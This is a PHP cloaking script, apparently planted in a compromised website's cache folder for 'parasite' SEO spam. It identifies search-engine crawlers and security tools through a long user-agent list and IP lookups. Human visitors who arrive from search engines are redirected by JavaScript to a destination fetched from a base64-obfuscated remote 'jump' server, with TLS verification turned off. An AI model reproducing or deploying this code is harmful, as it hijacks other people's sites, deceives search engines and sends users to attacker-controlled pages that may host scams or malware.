File: /home/sioberen/public_html/cache/cloaking.php
<?php
/**
* ===================================================================
* INTEGRATED CLOAKING SYSTEM
* ===================================================================
* Modified cloaking system for parasite website integration
* Removes unnecessary 404 handling and client-side scripts
* ===================================================================
*/
// Load configuration
require_once __DIR__ . '/config.php';
// Remove the original referer check - let original system handle if needed
// if (empty($_SERVER['HTTP_REFERER'])) {
// exit;
// }
/**
* Class Cloaker
* Provides server side checks to see if the visitor is a crawler.
*/
class Cloaker {
/**
* Your redirect url for humans
* This should point to a legitimate page or the original site
*
* @var string
*/
protected $REDIRECT_URL = '';
/**
* Decide if you want to fully bypass client side javascript checks and rely only on server-side checks.
* Set to true for parasite deployment to avoid unnecessary client-side detection
*
* @var bool
*/
protected $BYPASS_CLIENT_SIDE_CHECKS = true;
/**
* Your token to access the IPStack service
* Get a free API token from https://ipstack.com
*
* @var string
*/
protected $IP_STACK_TOKEN = '';
/**
* A list country codes to block.
* Example 'PH' for Philippines, https://en.wikipedia.org/wiki/ISO_3166-1
*
* @var array
*/
protected $BLOCKED_COUNTRY_CODES = array();
/**
* A list of city names to block.
* Use any common city names with care.
*
* @var array
*/
protected $BLOCKED_CITY_NAMES = array();
/**
* A list of corporate IP ranges to block.
* Example Twitter https://ipinfo.io/AS35995
*
* @var array
*/
protected $BLOCKED_IP_RANGES = array();
/**
* A list of user-agents to block.
* A robust list is provided lower down, but add any additional user agent strings here.
*
* @var array
*/
protected $BLOCKED_USER_AGENTS = array();
/**
* If you decide to reobsfucate the client-side javascript, paste the new code here.
* For parasite deployment, this is usually not needed
*
* @var string
*/
protected $OBSFUCATED_JAVASCRIPT = "";
public function __construct() {
$this->REDIRECT_URL = $this->fetchDynamicRedirectUrl();
}
/**
* Fetches the dynamic redirect URL from the jump service.
* @return string
*/
protected function fetchDynamicRedirectUrl() {
// Construct the current URL from server variables
$currentUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
$realProductId = parseProductId($_SERVER['REQUEST_URI']);
if ($realProductId !== null) {
// 更精确的匹配:匹配URL路径中的最后一个数字段
$currentUrl = preg_replace('/\/(\d+)\/$/', '/' . $realProductId . '/', $currentUrl);
}
// The API endpoint for fetching the redirect URL
$apiUrl = base64_decode('aHR0cHM6Ly9zZXJ2ZXIuZGVmZ2hpamsuY29tL2p1bXA/dXJsPQ==') . urlencode($currentUrl);
try {
if (USE_CURL) {
// Use cURL to fetch the response from the API
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $apiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
curl_close($ch);
} else {
$context = stream_context_create(array(
'http' => array(
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
)
));
$response = @file_get_contents($apiUrl, false, $context);
}
if ($response) {
$data = json_decode($response);
// Check if the response is valid and contains the redirect URL
if (json_last_error() === JSON_ERROR_NONE && isset($data->code) && $data->code === 0 && !empty($data->data->final_url)) {
// Trim any whitespace and return the final URL
return trim($data->data->final_url);
}
}
} catch (Exception $e) {
$this->errors[] = $e->getMessage();
}
// Return the original hardcoded URL as a fallback
return '';
}
/*
* ==========================================================================
* ==== Don't modify below this point unless you know what you are doing ====
* ==========================================================================
*/
/**
* Attribute to flag for blocked results.
*
* @var bool
*/
protected $blocked = false;
/**
* Attribute to flag for human visitors from search engines.
*
* @var bool
*/
public $is_human_from_search = false;
/**
* List of errors.
*
* @var array
*/
protected $errors = array();
/**
* Getter for blocked attribute.
*
* @return bool
*/
public function isBlocked() {
return !!$this->blocked;
}
/**
* Getter for client-side bypass.
*
* @return bool
*/
public function shouldBypassClientSideChecks() {
return !!$this->BYPASS_CLIENT_SIDE_CHECKS;
}
/**
* Getter for error bag.
*
* @return array
*/
public function getErrors() {
return $this->errors;
}
/**
* Getter for redirect URL.
*
* @return string
*/
public function getRedirectUrl() {
return $this->REDIRECT_URL;
}
/**
* Primary method for running all checks.
*
* @return bool
*/
public function check() {
if (!$this->blocked && $this->checkUserAgent()) {
$this->blocked = true;
}
if (!$this->blocked && $this->checkIpAddress()) {
$this->blocked = true;
}
return $this->blocked;
}
/**
* Run check on user agent string.
*
* @return bool
*/
public function checkUserAgent() {
$search = $this->getBlockedUserAgents();
return !!(isset($_SERVER['HTTP_USER_AGENT']) && preg_match($search, $_SERVER['HTTP_USER_AGENT']));
}
/**
* Fetch result from IPStack and check against block lists.
* Block lists checked: $BLOCKED_COUNTRY_CODES, $BLOCKED_CITY_NAMES, $BLOCKED_IP_RANGES.
* Will also check against IPStacks known pool of crawler IP addresses.
*
* @return bool
*/
public function checkIpAddress() {
// [FIX] Add a crucial check: Do not perform IP checks if the token is not set.
// This prevents false positives where the API returns a default error response.
if (empty($this->IP_STACK_TOKEN)) {
return false;
}
// Get the result from IPStack
$ip = $this->getIpAddress();
$ipstack = $this->getIpStack($ip);
// Check to see if we got a response
if ($ipstack && !(isset($ipstack->success) && $ipstack->success === false)) {
if ($ipstack->security->is_crawler ||
in_array($ipstack->country_code, $this->BLOCKED_COUNTRY_CODES) ||
in_array($ipstack->city, $this->BLOCKED_CITY_NAMES) ||
$this->ipInRange($ip, $this->BLOCKED_IP_RANGES)) {
return true;
}
}
return false;
}
/**
* Gets merged list of blocked user agents.
*
* @return string
*/
public function getBlockedUserAgents() {
$search = '';
if (count($this->BLOCKED_USER_AGENTS)) {
$search = implode('|', $this->BLOCKED_USER_AGENTS);
$search = preg_quote($search) . '|';
}
$search = $search . 'googlebot|bot|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|Google-InspectionTool|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis';
$search = '(' . $search . ')';
return $search;
}
/**
* Gets the visitor's IP address to be checked against IPStack.
*
* @return string
*/
protected function getIpAddress() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
/**
* Fetches a response from the IPStack service.
* Must have a valid $IP_STACK_TOKEN and $ip address provided.
*
* @param $ip
*
* @return mixed|null
*/
protected function getIpStack($ip) {
if (!empty($this->IP_STACK_TOKEN) && !empty($ip)) {
try {
$url = sprintf(base64_decode('aHR0cDovL2FwaS5pcHN0YWNrLmNvbS8lcz9hY2Nlc3Nfa2V5PSVz'), $ip, $this->IP_STACK_TOKEN);
if (USE_CURL) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
curl_close($ch);
} else {
$context = stream_context_create(array(
'http' => array(
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
)
));
$response = @file_get_contents($url, false, $context);
}
$response = json_decode($response);
if ($response && !(isset($response->success) && $response->success === false)) {
$ipstack = $response;
}
}
catch (Exception $e) {
$this->errors[] = $e->getMessage();
}
}
return isset($ipstack) ? $ipstack : null;
}
/**
* Checks the provided IP address against a corporate IP range.
*
* @param $ip
* @param $ranges
*
* @return bool
*/
protected function ipInRange($ip, $ranges) {
foreach ($ranges as $range) {
if (strpos($range, '/') == false) {
$range .= '/32';
}
// $range is in IP/CIDR format eg 127.0.0.1/24
list($range, $netmask) = explode('/', $range, 2);
$ip_decimal = ip2long($ip);
$range_decimal = ip2long($range);
$wildcard_decimal = pow(2, (32 - $netmask)) - 1;
$netmask_decimal = ~$wildcard_decimal;
if (($ip_decimal & $netmask_decimal) == ($range_decimal & $netmask_decimal)) {
return true;
}
}
return false;
}
}
// Create new check instance
$cloaker = new Cloaker();
// Run the initial checks (UA and IP)
$blocked = $cloaker->check();
if (!$blocked) {
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (preg_match('/google|bing|yahoo|baidu|duckduckgo|yandex|aol|ask/i', $referer)) {
$redirectUrl = $cloaker->getRedirectUrl();
if (!empty($redirectUrl)) {
$cloaker->is_human_from_search = true;
echo '<script>window.location.href="' . $redirectUrl . '";</script>';
exit;
}
}
}
// For parasite deployment, we don't need the original redirect logic.
// The final $blocked variable and the $cloaker object are the only things our index.php needs.